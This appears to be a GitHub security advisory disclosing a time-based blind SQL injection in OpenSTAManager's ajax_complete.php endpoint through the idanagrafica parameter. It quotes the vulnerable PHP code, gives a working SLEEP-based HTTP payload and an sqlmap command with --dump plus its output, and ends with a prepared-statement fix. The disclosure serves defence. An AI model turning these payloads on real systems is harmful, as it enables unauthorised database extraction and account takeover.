+ "details": "## Summary\nA SQL Injection vulnerability exists in the `ajax_complete.php` endpoint when handling the `get_sedi` operation. An authenticated attacker can inject malicious SQL code through the `idanagrafica` parameter, leading to unauthorized database access.\n\n\n## Proof of Concept\n\n### Vulnerable Code\n**File:** `modules/anagrafiche/ajax/complete.php:28`\n\n```php\ncase 'get_sedi':\n $idanagrafica = get('idanagrafica');\n $q = \"SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione \n FROM an_sedi \n WHERE idanagrafica='\".$idanagrafica.\"' ...\";\n $rs = $dbo->fetchArray($q);\n```\n\n### Data Flow\n1. **Source:** `$_GET['idanagrafica']` → `get('idanagrafica')`\n2. **Vulnerable:** User input concatenated directly into SQL query with single quotes\n3. **Sink:** `$dbo->fetchArray($q)` executes the malicious query\n\n### Exploit\n\n**Manual PoC (Time-based Blind SQLi):**\n```http\nGET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1\nHost: localhost:8081\nCookie: PHPSESSID=<valid-session>\n```\n<img width=\"1304\" height=\"580\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4ffcdacf-d56c-4a44-ad95-d6cecd0f05c8\" />\n\n**SQLMap Exploitation:**\n```bash\nsqlmap -u \"http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*\" \\\n --cookie=\"PHPSESSID=<session>\" \\\n --dbms=MySQL \\\n --technique=T \\\n --level=3 \\\n --dump\n```\n\n**SQLMap Output:**\n```\n[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable\nParameter: #1* (URI)\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF\nback-end DBMS: MySQL >= 5.0.12\n```\n\n<img width=\"1284\" height=\"745\" alt=\"image\" src=\"https://github.com/user-attachments/assets/5c640132-4f52-46bd-96fa-14d9987d4759\" />\n\n\n## Impact\n- **Data Exfiltration:** Complete database extraction including user credentials, customer data, financial records\n- **Privilege Escalation:** Modification of `zz_users` table to gain admin access\n- **Data Integrity:** Unauthorized modification or deletion of records\n- **Potential RCE:** Via `SELECT ... INTO OUTFILE` if file permissions allow\n\n## Affected Versions\n- OpenSTAManager: Verified in latest version (as of December 2025)\n- All versions using this endpoint are likely affected\n\n## Remediation\n\nReplace direct concatenation with prepared statements:\n\n**Before:**\n```php\n$idanagrafica = get('idanagrafica');\n$q = \"SELECT ... WHERE idanagrafica='\".$idanagrafica.\"' ...\";\n```\n\n**After:**\n```php\n$idanagrafica = get('idanagrafica');\n$q = \"SELECT ... WHERE idanagrafica=\".prepare($idanagrafica).\" ...\";\n```\n\n## Credit\nDiscovered by: Łukasz Rybak",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments